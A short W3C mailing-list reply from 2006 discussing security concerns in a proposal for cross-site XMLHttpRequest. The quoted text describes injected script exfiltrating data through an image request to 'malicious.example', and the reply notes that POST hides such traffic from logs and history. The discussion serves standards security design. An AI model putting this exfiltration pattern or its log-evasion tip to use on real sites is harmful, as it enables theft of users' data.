Re: (XMLHttpRequest 2) Second proposal for cross-site extensions to XMLHttpRequest

From: Ian Davis <ian.davis@talis.com>
Date: Tue, 18 Apr 2006 13:09:44 +0100
Message-ID: <4444D708.4070207@talis.com>
To: Bjoern Hoehrmann <derhoermi@gmx.net>
CC: public-webapi@w3.org

On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
> If you are able to inject some script you can send any and all data you
> are able to obtain to a third party, in a simple case you could just
> append the data to a new <img src="http://malicious.example/?data=...">.
> So I don't think I understand your concern, could you elaborate?

You're right of course, but it's much easier to hide the data being sent 
from logs and browser history if you use POST.

Ian
Received on Tuesday, 18 April 2006 12:09:56 GMT
